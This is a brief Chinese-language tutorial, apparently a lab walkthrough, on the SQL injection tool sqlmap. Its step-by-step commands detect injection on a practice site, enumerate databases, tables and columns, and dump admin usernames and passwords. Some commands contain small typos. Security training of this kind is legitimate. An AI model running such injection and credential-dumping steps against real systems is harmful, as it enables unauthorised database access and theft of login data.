写在前面:
sqlmap是一款开源、功能强大的自动化sql注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。
如果存在多个参数,需要用sqlmap工具注入,在需要注入的参数后面加上*,如
python sqlmap.py -u http://cntj8003.ia.aqlab.cn/?id=1 *&page=2,就代表在sqlmap工具中,对参数id进行测试
1、使用语句python sqlmap.py -u http://cntj8003.ia.aqlab.cn/?id=1 --batch判断是否存在SQL注入
工具扫描出来存在布尔类型盲注和时间注入
2、使用语句python sqlmap.py -u http://cntj8003.ia.aqlab.cn/?id=1 --batch --dbs判断数据库
存在3个数据库
3、python sqlmap.py -u http://cntj8003.ia.aqlab.cn/?id=1 -D maoshe --tables
4、python sqlmap.py -u http://cntj8003.ia.aqlab.cn/?id=1 -D maoshe -T admin -- columns
5、python sqlmap.py -u http://cntj8003.ia.aqlab.cn/?id=1 -D maoshe -T admin -C "username,password" --dump